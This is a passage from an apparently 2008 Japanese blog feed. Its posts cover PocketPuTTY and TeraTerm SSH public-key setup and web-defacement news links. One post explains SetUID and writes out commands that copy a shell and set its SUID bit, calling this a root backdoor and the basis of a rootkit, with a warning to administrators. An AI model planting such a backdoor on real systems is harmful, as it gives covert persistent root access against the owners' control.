側のPocketPuTTYフォルダに入れておけばＯＫ。&lt;br /&gt;&lt;br /&gt;４．PocketPuTTYの設定&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_8igRYQ31rD8/R90xGQOuEbI/AAAAAAAAADs/ZJjXCuhAAz0/s1600-h/puttyconfig01.png"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://3.bp.blogspot.com/_8igRYQ31rD8/R90xGQOuEbI/AAAAAAAAADs/ZJjXCuhAAz0/s200/puttyconfig01.png" alt="" id="BLOGGER_PHOTO_ID_5178349130051621298" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;今回使用しているバージョンは&lt;br /&gt;PocketPuTTY.wm6.2007-11-22.zip&lt;br /&gt;です。もし画面の構成が違う場合はバージョンを確認して下さい。&lt;br /&gt;&lt;br /&gt;[SSHタブ]を選択し、&lt;br /&gt;先ほど作成した id_rsa.ppk ファイルをフルパスで指定します。&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_8igRYQ31rD8/R90xGgOuEcI/AAAAAAAAAD0/6J-FZKeO8p8/s1600-h/puttyconfig02.png"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://4.bp.blogspot.com/_8igRYQ31rD8/R90xGgOuEcI/AAAAAAAAAD0/6J-FZKeO8p8/s200/puttyconfig02.png" alt="" id="BLOGGER_PHOTO_ID_5178349134346588610" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;[Dataタブ]　では使用するユーザ名を指定します。&lt;br /&gt;Terminalサイズ等は特に変更する必要はありません。&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_8igRYQ31rD8/R90xGgOuEdI/AAAAAAAAAD8/CYLUgjSlI6E/s1600-h/puttyconfig03.png"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://4.bp.blogspot.com/_8igRYQ31rD8/R90xGgOuEdI/AAAAAAAAAD8/CYLUgjSlI6E/s200/puttyconfig03.png" alt="" id="BLOGGER_PHOTO_ID_5178349134346588626" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;最後に、[Sessionタブ]から&lt;br /&gt;&lt;br /&gt;接続するサーバ名を [Host Name (or IP address)] の部分に&lt;br /&gt;記述。&lt;br /&gt;先ほどのタブで設定した内容を名前をつけて保存します。&lt;br /&gt;[Save]ボタンを押すと、[Stored session] 欄に表示されますので&lt;br /&gt;次回からは、その行を選択して [Load]ボタンを押すことで&lt;br /&gt;いちいち入力する手間が省けます。&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;接続するとこんな画面が出ます&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_8igRYQ31rD8/R90xGwOuEeI/AAAAAAAAAEE/FNBED6JAxy4/s1600-h/puttyconfig04.png"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://1.bp.blogspot.com/_8igRYQ31rD8/R90xGwOuEeI/AAAAAAAAAEE/FNBED6JAxy4/s200/puttyconfig04.png" alt="" id="BLOGGER_PHOTO_ID_5178349138641555938" border="0" /&gt;&lt;/a&gt;Using username "root99".&lt;br /&gt;Authenticating with public key "imported-openssh-key"&lt;br /&gt;Passphrase for key "imported-openssh-key" :&lt;br /&gt;&lt;br /&gt;ここでパスフレーズを入力してログイン完了。&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;　　　　　　　　　　　　　　つづく&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;iframe style="border: medium none ;" border="0" marginwidth="0" marginheight="0" src="http://rcm-jp.amazon.co.jp/e/cm?t=secblo-22&amp;amp;o=9&amp;amp;p=15&amp;amp;l=st1&amp;amp;mode=electronics-jp&amp;amp;search=W-ZERO3&amp;amp;fc1=000000&amp;amp;lt1=&amp;amp;lc1=3366FF&amp;amp;bg1=FFFFFF&amp;amp;f=ifr" frameborder="0" height="240" scrolling="no" width="468"&gt;&lt;/iframe&gt;&lt;/center&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5550886365390077462-4922857301537650120?l=root99.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://root99.blogspot.com/feeds/4922857301537650120/comments/default' title='コメントの投稿'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5550886365390077462&amp;postID=4922857301537650120' title='0 件のコメント'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5550886365390077462/posts/default/4922857301537650120'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5550886365390077462/posts/default/4922857301537650120'/><link rel='alternate' type='text/html' href='http://root99.blogspot.com/2008/03/advancedw-zero3esssh2.html' title='Advanced/W-ZERO3［es］でSSH2で公開鍵認証'/><author><name>john</name><uri>http://www.blogger.com/profile/03499652466972721958</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_8igRYQ31rD8/R90TTwOuEUI/AAAAAAAAAC0/-z2-rKAgbrg/s72-c/PuTTY_Generator1.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5550886365390077462.post-2940276644779011032</id><published>2008-03-07T06:11:00.009+09:00</published><updated>2008-03-15T17:25:34.612+09:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='RootKit BackDoor Hack SuID exploit　perl-suidperl'/><title type='text'>BackDoorを作成する方法は？</title><content type='html'>・SetUID とは&lt;br /&gt;UNIXのファイルには、UID（ユーザーID）とGID（グループID）があり、それぞれの単位で&lt;br /&gt;ファイルを参照・書き込み・実行といった権限を設定することができます。&lt;br /&gt;&lt;br /&gt;例えば、/etc/shadowファイルはrootユーザにのみパーミッションがついていますから&lt;br /&gt;一般ユーザは読み書きすることができません。&lt;br /&gt;なのに passwdコマンドを使って自分のログイン・パスワードを変更、つまり shadowファイルを&lt;br /&gt;書き換えることが可能です。&lt;br /&gt;&lt;br /&gt;どうしてこんなことが可能になるんでしょう？ passwdコマンドの権限を見てみましょう。&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:arial;"&gt;-rw&lt;span style="color:#ff0000;"&gt;s&lt;/span&gt;r-xr-x　1　root　root　22984 　1月 7 　2007　/usr/bin/passwd&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:arial;"&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:arial;"&gt;所有者がrootになっていて権限のところが rw&lt;span style="color:#ff0000;"&gt;s&lt;/span&gt; となっています。&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:arial;"&gt;これはプログラムに&lt;/span&gt;&lt;span style="font-family:arial;"&gt;所有者のUID を Set したという意味の表示で、どのユーザから実行したとしても&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:Arial;"&gt;実行中は&lt;span style="color:#ff0000;"&gt;rootの権限で動きます&lt;/span&gt;。だから shadowファイルの変更もできていたんですね。&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:Arial;"&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;hogeというコマンドにSetUIDする場合は次のコマンドで行います。&lt;br /&gt;#chmod u+s hoge もしくは　#chmod 4755 hoge&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;さて、&lt;br /&gt;世の中にはRootKitというものがありまして、これをコンパイルしてどっかに置いといて&lt;br /&gt;一般ユーザで実行したらアラ不思議 root になってしまうという物です。&lt;br /&gt;要するに、rootでSuIDの仕掛けを施した普通のコマンドに見えるプログラムのことですね。&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;では簡単に作ってみることにしましょう。&lt;br /&gt;&lt;br /&gt;えーと・・・。&lt;br /&gt;単に　/bin/sh に SuID するだけです・・・。&lt;br /&gt;&lt;br /&gt;# whoami&lt;br /&gt;root　　　　　　　　&lt;span style="color:#6600cc;"&gt;←※rootで実行します。&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;# cp /bin/sh /home/root99/changeroot.sh&lt;br /&gt;#chmod 4755 /home/root99/changeroot.sh &lt;span style="color:#6600cc;"&gt;←※SuIDします。&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;# ls -l /home/root99/changeroot.sh&lt;br /&gt;&lt;span style="font-family:arial;"&gt;-rw&lt;span style="color:#ff0000;"&gt;s&lt;/span&gt;r-xr-x　1　root root　722684　3月15　16:22　/home/root99/changeroot.sh*&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;# exit&lt;br /&gt;# whoami　　　　　　&lt;span style="color:#6600cc;"&gt;←※一般ユーザに戻る&lt;/span&gt;&lt;br /&gt;root99&lt;br /&gt;&lt;br /&gt;次に一般ユーザでこのプログラムを実行したらrootで動くはず。&lt;br /&gt;# /home/root99/changeroot.sh &lt;span style="color:#6600cc;"&gt;←※実行&lt;/span&gt;&lt;br /&gt;changeroot.sh-3.1$&lt;br /&gt;changeroot.sh-3.1$ whoami　　　　　&lt;span style="color:#6600cc;"&gt;←※ユーザを確認してみる&lt;/span&gt;&lt;br /&gt;root99&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;アレっ？？　一般ユーザのままですね。&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;実は Linux の /bin/sh と /bin/bash には SuID した場合の対策が取られています。&lt;br /&gt;手元の Unux で確認したところ、Linux 以外のshは正常にSuIDで機能しました。&lt;br /&gt;&lt;br /&gt;#cp /bin/ksh /home/root99/chgroot.ksh&lt;br /&gt;#chmod 4755 /home/root99/chgroot.ksh　　　&lt;span style="color:#6600cc;"&gt;←※コピーしたkshにSuID&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;#/home/root99/chgroot.ksh　　　　&lt;span style="color:#6600cc;"&gt;←※実行&lt;/span&gt;&lt;br /&gt;#&lt;br /&gt;# whoami&lt;br /&gt;root　　　　　　　　　　　　　　　　　　　　&lt;span style="color:#6600cc;"&gt;←※rootになった。&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;上記のように、一回でもrootになることができれば、いつでもrootになれるコマンドを作ることが&lt;br /&gt;できます。これが即ち rootkitの基本 。&lt;br /&gt;定期的に SuIDビットの立ったファイルをチェックしてない管理者がいたとしたら、そのサーバは&lt;br /&gt;知らぬ間にクラッカーの巣になっているかも知れませんよ？&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;color:#666666;"&gt;※shell scriptにはセキュリティ上の理由からSuIDが正常に機能しません。&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:85%;color:#666666;"&gt;　perl の場合はperl-suidperlモジュールをインストールすることで可能です。&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;次回は、SuID ファイルなんかチェックしても無駄無駄無駄ぁぁぁぁぁぁ！！！！&lt;br /&gt;です。&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5550886365390077462-2940276644779011032?l=root99.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://root99.blogspot.com/feeds/2940276644779011032/comments/default' title='コメントの投稿'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5550886365390077462&amp;postID=2940276644779011032' title='0 件のコメント'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5550886365390077462/posts/default/2940276644779011032'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5550886365390077462/posts/default/2940276644779011032'/><link rel='alternate' type='text/html' href='http://root99.blogspot.com/2008/03/backdoor.html' title='BackDoorを作成する方法は？'/><author><name>john</name><uri>http://www.blogger.com/profile/03499652466972721958</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5550886365390077462.post-2745791577568741943</id><published>2008-03-05T05:57:00.007+09:00</published><updated>2008-04-23T16:27:05.453+09:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Linux SSH2 公開鍵認証　UTF-8 TeraTerm Pro with TTSSH2'/><title type='text'>TeraTermからSSH2で公開鍵認証</title><content type='html'>●Windowsから公開認証鍵を利用する&lt;br /&gt;&lt;br /&gt;ググったら、出来ない君な設定方法が多いので、この通りやったら絶対できるはず&lt;br /&gt;というテキストをメモ代わりに置いておきます。&lt;br /&gt;&lt;br /&gt;動作検証は以下の通りな感じ&lt;br /&gt;SentOS5&lt;br /&gt;　openssh-4.3p2-24.el5&lt;br /&gt;　openssh-server-4.3p2-24.el5&lt;br /&gt;　openssh-clients-4.3p2-24.el5&lt;br /&gt;&lt;br /&gt;RedHat EL4/WS3&lt;br /&gt;　openssh-server-3.6.1p2-33.30.14&lt;br /&gt;　openssh-3.6.1p2-33.30.14&lt;br /&gt;　openssh-clients-3.6.1p2-33.30.14&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;まずは、telnetクライアントソフトを用意しましょう。&lt;br /&gt;&lt;br /&gt;・UTF-8 TeraTerm Pro with TTSSH2　 4.58 2008-02-29 22:16&lt;br /&gt;&lt;a href="http://sourceforge.jp/projects/ttssh2/"&gt;http://sourceforge.jp/projects/ttssh2/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;いろいろありますが、TeraTerm がお勧めです。っていうかコレ以外ダメです。&lt;br /&gt;しかし、上記以外から TeraTerm 落としてきて「SSH2で接続できません！」などと、のたまわれても&lt;br /&gt;サポート出来ません。ちょっと前のだと 1.5 までしか対応してません。&lt;br /&gt;&lt;br /&gt;あと最近主流になってきた PuTTY も無理です。理由は名前が卑猥だからです。&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;１．鍵の作成&lt;br /&gt;&lt;br /&gt;Linuxサーバ側で鍵を作成します。　&lt;span style="font-size:85%;"&gt;(鍵ペアを作るだけなので、OpenSSHに準拠(略)ならどこでも良い)&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-family:arial;"&gt;[root99@~/.ssh]# &lt;/span&gt;&lt;span style="FONT-WEIGHT: bold"&gt;ssh-keygen -t rsa&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:arial;"&gt;Generating public/private rsa key pair.&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:arial;"&gt;Enter file in which to save the key (/home/root99/.ssh/id_rsa): &lt;/span&gt;&lt;span style="FONT-WEIGHT: bold; COLOR: rgb(0,0,153)"&gt;&lt;エンター&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:arial;"&gt;Enter passphrase (empty for no passphrase): &lt;/span&gt;&lt;span style="COLOR: rgb(51,204,255)"&gt;&lt;span style="font-family:arial;"&gt;root99hoge　&lt;/span&gt;（実際には見えない）&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:arial;"&gt;Enter same passphrase again: &lt;/span&gt;&lt;span style="COLOR: rgb(51,204,255)"&gt;&lt;span style="font-family:arial;"&gt;root99hoge　&lt;/span&gt;（実際には見えない）&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:arial;"&gt;Your identification has been saved in /home/root99/.ssh/id_rsa.&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:arial;"&gt;Your public key has been saved in /home/root99/.ssh/id_rsa.pub.&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:arial;"&gt;The key fingerprint is:&lt;/span&gt;&lt;span style="font-family:arial;"&gt;c5:e0:fc:1b:94:f5:f4:89:7e:64:da:3f:39:cb:b9:91 root99@server&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="COLOR: rgb(51,204,255)"&gt;水色の部分はパスフレーズ&lt;/span&gt;です。ログインのパスワードとは別物なんですが、分からなければ&lt;br /&gt;まぁ、パスワードみたいなもんなので好きに決めて下さい。&lt;br /&gt;これで鍵ペアが作成できました。&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="COLOR: rgb(51,204,255)"&gt;&lt;/span&gt;&lt;span style="font-family:courier new;"&gt;[root99@server ~/.ssh]# &lt;span style="COLOR: rgb(0,0,153)"&gt;ls -lartF&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;drwxr-x--- 6 root99 root99 4096 2月 10 14:43 ../&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;&lt;/span&gt;&lt;span style="font-family:courier new;"&gt;-rw-r--r-- 1 root99 root99 239 12月 27 21:23　known_hosts&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;&lt;/span&gt;&lt;span style="font-family:courier new;"&gt;-rw&lt;/span&gt;&lt;span style="font-family:courier new;"&gt;------- &lt;/span&gt;&lt;span style="font-family:courier new;"&gt;1 root99 root99 391 3月 5 06:14 &lt;span style="COLOR: rgb(0,153,0)"&gt;id_rsa.pub&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;-rw------- 1 root99 root99 1743 3月 5 06:14 &lt;span style="COLOR: rgb(255,0,0)"&gt;id_rsa&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;drwx------ 2 root99 root99 4096 3月 5 06:14 ./&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;こんな風になってますか？なってなければ&lt;br /&gt;&lt;span style="color:#000000;"&gt;#&lt;span style="color:#000000;"&gt; &lt;/span&gt;&lt;span style="COLOR: rgb(0,0,153)"&gt;chmod 600&lt;/span&gt; &lt;/span&gt;&lt;span style="font-family:courier new;"&gt;&lt;span style="COLOR: rgb(255,0,0)"&gt;&lt;span style="COLOR: rgb(0,153,0)"&gt;id_rsa.pub&lt;/span&gt; &lt;/span&gt;&lt;/span&gt;&lt;span style="font-family:courier new;"&gt;&lt;span style="COLOR: rgb(255,0,0)"&gt;id_rsa&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;しといて下さいね。&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;これからやりたいことは、&lt;br /&gt;&lt;br /&gt;クライアントA　－－－－－SSH接続－－－→　サーバ&lt;br /&gt;&lt;span style="COLOR: rgb(255,0,0)"&gt;Aの秘密鍵&lt;/span&gt;　　　　　　　　　　　　　　　　&lt;span style="COLOR: rgb(0,153,0)"&gt;Aの公開鍵&lt;/span&gt;は認証済みの状態&lt;br /&gt;&lt;br /&gt;という風にしたいわけです。　さっき作成したファイルで言うと&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;&lt;span style="COLOR: rgb(255,0,0)"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family:courier new;"&gt;&lt;span style="COLOR: rgb(255,0,0)"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family:courier new;"&gt;&lt;span style="COLOR: rgb(255,0,0)"&gt;id_rsa&lt;/span&gt;&lt;/span&gt;　　　　　秘密鍵&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;&lt;span style="COLOR: rgb(255,0,0)"&gt;&lt;span style="COLOR: rgb(0,153,0)"&gt;id_rsa.pub&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;　公開鍵&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;&lt;span style="COLOR: rgb(255,0,0)"&gt;&lt;/span&gt;&lt;/span&gt;という組み合わせです。&lt;br /&gt;ですので &lt;span style="color:#ff0000;"&gt;id_rsa&lt;/span&gt; ファイルはクライアント側で使用する物ですので、サーバで鍵ペアを作った場合は&lt;br /&gt;ダウンロードして、クライアントの TeraTermフォルダにでも入れておいて下さい。&lt;br /&gt;ダウンロードし終わったらサーバ側の &lt;span style="color:#ff0000;"&gt;id_rsa &lt;/span&gt;ファイルは削除しておきましょう。&lt;br /&gt;他人に盗まれたらせっかく認証鍵を作った意味が無いですからね。&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;２．サーバへの認証&lt;br /&gt;先ほどの公開鍵をサーバ側で認証済みの状態にするにはどうすれば良いかというと&lt;br /&gt;ユーザーディレクトリの下、つまり　/home/root99/.ssh/authorized_keys に記述を追加することで&lt;br /&gt;可能です。&lt;br /&gt;既存ファイルが無い場合は新しく作ってもいいですが&lt;br /&gt;# mv /home/root99/.ssh/&lt;span style="color:#009900;"&gt;id_rsa.pub&lt;/span&gt;　 /home/root99/.ssh/authorized_keys&lt;br /&gt;としても同じことですね？&lt;br /&gt;アクセス権が&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;-rw------- 1 root99 root99 221 3月 5 04:46 authorized_keys&lt;/span&gt;&lt;br /&gt;となっていることを確認して下さい。&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;３．TeraTermの設定&lt;br /&gt;TeraTerm を起動して [Setup] → [SSH Authentication...] を選択&lt;br /&gt;User name： にログインアカウントを入力。&lt;br /&gt;[Use RSA/DSA key to log in]ボタンにチェックを入れ、先ほどの[&lt;span style="color:#ff0000;"&gt;id_rsa&lt;/span&gt;]を選択して下さい。&lt;br /&gt;[OK]ボタンを押し、&lt;br /&gt;[Setup] → [Save setup...]で、TERATERM.ini ファイルを保存しておきましょう。&lt;br /&gt;ちなみに、ini ファイル名は何でも構いませんので、サーバが複数ある場合は分けて作成しても&lt;br /&gt;良いでしょう。&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;４．sshd_configの編集&lt;br /&gt;これまでは一般ユーザの権限で作業していましたが、次はroot権限で作業します。&lt;br /&gt;&lt;br /&gt;# vi /etc/ssh/sshd_config&lt;br /&gt;#必ずする設定&lt;br /&gt;RSAAuthentication yes #RSA認証を使う&lt;br /&gt;PubkeyAuthentication yes #公開認証鍵を使う&lt;br /&gt;PasswordAuthentication no #パスワードを使用しない（パスフレーズを使用する）&lt;br /&gt;AuthorizedKeysFile .ssh/authorized_keys #ここのファイル名と合わせること！&lt;br /&gt;&lt;br /&gt;#あった方が良い設定&lt;br /&gt;PermitRootLogin no #rootでのログインを許可しない&lt;br /&gt;ChallengeResponseAuthentication no　#チャレンジレスポンス認証を許可しない&lt;br /&gt;PermitEmptyPassword no #パスワード無しを許可しない&lt;br /&gt;RhostsRSAAuthentication no #サーバ間のパス無しアクセスを許可しない&lt;br /&gt;IgnoreRhosts yes #サーバ間のパス無しアクセスを許可しない&lt;br /&gt;HostbasedAuthentication no #特定のホストのパス無しアクセスを許可しない&lt;br /&gt;IgnoreUserKnownHosts yes #拒否するホストを設定するかもしれない&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;sshdを再起動して反映する&lt;br /&gt;# service sshd restart または　# /etc/init.d/sshd restart&lt;br /&gt;としてサービスの再起動をします。&lt;br /&gt;&lt;span style="font-size:85%;color:#333333;"&gt;ちなみに、初心者の方は&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:85%;color:#333333;"&gt;「ssh でつないで作業してる時にサービス再起動していいのだろうか？」&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:85%;color:#333333;"&gt;と心配するかも知れませんが、今現在繋がってるセッションは維持されますので&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:85%;color:#333333;"&gt;サービスを停止したとしても大丈夫です。&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;[root@server /home/root]# /etc/init.d/sshd restart&lt;br /&gt;sshd を停止中: [ OK ]&lt;br /&gt;sshd を起動中: [ OK ]&lt;br /&gt;&lt;br /&gt;正常に起動できたら、[ OK ] となるはず。これでサーバ側の設定も完了しました。&lt;br /&gt;クライアントから接続できるか確認してみて下さい。&lt;br /&gt;&lt;br /&gt;TeraTerm からのアクセスの場合は&lt;br /&gt;TCP/IP Host:[ hoge.example.com ]&lt;br /&gt;Service ●SSH SSH version: [ SSH2 ]&lt;br /&gt;の状態で [OK] ボタンを押すと、先ほどの &lt;span style="color:#ff0000;"&gt;id_rsa&lt;/span&gt; キーを設定した画面が出てきますので、&lt;br /&gt;認証鍵のペアを作成した時に入力したパスフレーズを&lt;br /&gt;Passphrase: [ ] に入力します。　今回の例だと &lt;span style="color:#00cccc;"&gt;root99hoge&lt;/span&gt; 。&lt;br /&gt;●Use RSA/DSA key to log in Private key file [ id_rsa ]&lt;br /&gt;とチェックが入っていることを必ず確認して下さい。&lt;br /&gt;&lt;br /&gt;他の Unix クライアントからアクセスする場合は&lt;br /&gt;# ssh -i /home/hoge/id_rsa serverB.example.com -l root99&lt;br /&gt;として、秘密鍵とユーザ名の指定をします。&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;※おまけ　　　TeraTermマクロの書き方　例（root99.ttl ）　&lt;br /&gt;;Macroココカラ============================================&lt;br /&gt;&lt;span style="font-size:85%;"&gt;username = 'root99' &lt;span style="COLOR: rgb(204,51,204)"&gt;;ログインユーザ名&lt;/span&gt;&lt;br /&gt;hostname = 'xxx.xxx.xxx.xxx' &lt;span style="COLOR: rgb(204,51,204)"&gt;;サーバのIPアドレス&lt;/span&gt;&lt;br /&gt;LinuxPrompt = 'root99' &lt;span style="COLOR: rgb(204,51,204)"&gt;;ログインに成功した時に表示される文字列&lt;/span&gt;&lt;br /&gt;PasswordPrompt = 'パスワード:' &lt;span style="COLOR: rgb(204,51,204)"&gt;;パスワードを要求される時に表示される文字列&lt;/span&gt;&lt;br /&gt;getpassword 'password.dat' 'passwordROOT99' PasswordROOT99&lt;br /&gt;&lt;br /&gt;msg = hostname&lt;br /&gt;strconcat msg ':22 /ssh /KR=UTF8 /KT=UTF8 /F=TTERM001.INI /keyfile=id_rsa /auth=publickey /user='&lt;br /&gt;strconcat msg username&lt;br /&gt;strconcat msg ' /passwd='&lt;br /&gt;strconcat msg PasswordROOT99&lt;br /&gt;connect msg&lt;br /&gt;settitle 'hoge.example.jp'&lt;br /&gt;&lt;br /&gt;wait LinuxPrompt&lt;br /&gt;sendln 'su -' &lt;span style="COLOR: rgb(204,51,204)"&gt;;自動的にrootになりたければここから下も記述&lt;/span&gt;&lt;br /&gt;wait PasswordPrompt&lt;br /&gt;getpassword 'password.dat' 'passwordROOT' PasswordROOT&lt;br /&gt;sendln PasswordROOT&lt;br /&gt;&lt;br /&gt;sendln "cd /home/root/"&lt;br /&gt;sendln "alias ll='ls -lartF --color=none'"&lt;/span&gt;&lt;br /&gt;;Macroココマデ============================================&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;完成したら root99.ttl アイコンをＷクリックしてみましょう。&lt;br /&gt;一番最初の実行時のみパスワードを聞いてきます。&lt;br /&gt;（もし入力に失敗したら、TeraTermディレクトリのpassword.datの中の該当行を削除）&lt;br /&gt;自動的に接続して ROOT にまでなれたら成功。&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5550886365390077462-2745791577568741943?l=root99.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://root99.blogspot.com/feeds/2745791577568741943/comments/default' title='コメントの投稿'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5550886365390077462&amp;postID=2745791577568741943' title='1 件のコメント'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5550886365390077462/posts/default/2745791577568741943'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5550886365390077462/posts/default/2745791577568741943'/><link rel='alternate' type='text/html' href='http://root99.blogspot.com/2008/03/teratermssh2.html' title='TeraTermからSSH2で公開鍵認証'/><author><name>john</name><uri>http://www.blogger.com/profile/03499652466972721958</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5550886365390077462.post-791107170069944112</id><published>2008-02-24T20:00:00.007+09:00</published><updated>2008-02-25T03:36:29.926+09:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Web改竄　ハッキング　Security'/><title type='text'>Web改竄情報</title><content type='html'>毎日どこかで誰かのWEBが改竄されている。&lt;br /&gt;（・・・というセキュリティ担当者の気休めになるページ）&lt;br /&gt;&lt;br /&gt;&lt;a href="http://zone-h.org/"&gt;http://zone-h.org/&lt;/a&gt;&lt;br /&gt;UNRESTRICTED INFORMATION&lt;br /&gt;&lt;br /&gt;&lt;a href="https://www.netsecurity.ne.jp/9.html"&gt;https://www.netsecurity.ne.jp/9.html&lt;/a&gt;&lt;br /&gt;Scan NetSecurity&lt;br /&gt;&lt;br /&gt;&lt;a href="http://izumino.jp/Security/def_jp.html"&gt;http://izumino.jp/Security/def_jp.html&lt;/a&gt;&lt;br /&gt;JPドメイン　Web改竄速報&lt;br /&gt;&lt;br /&gt;http://www.fearoot.com/&lt;br 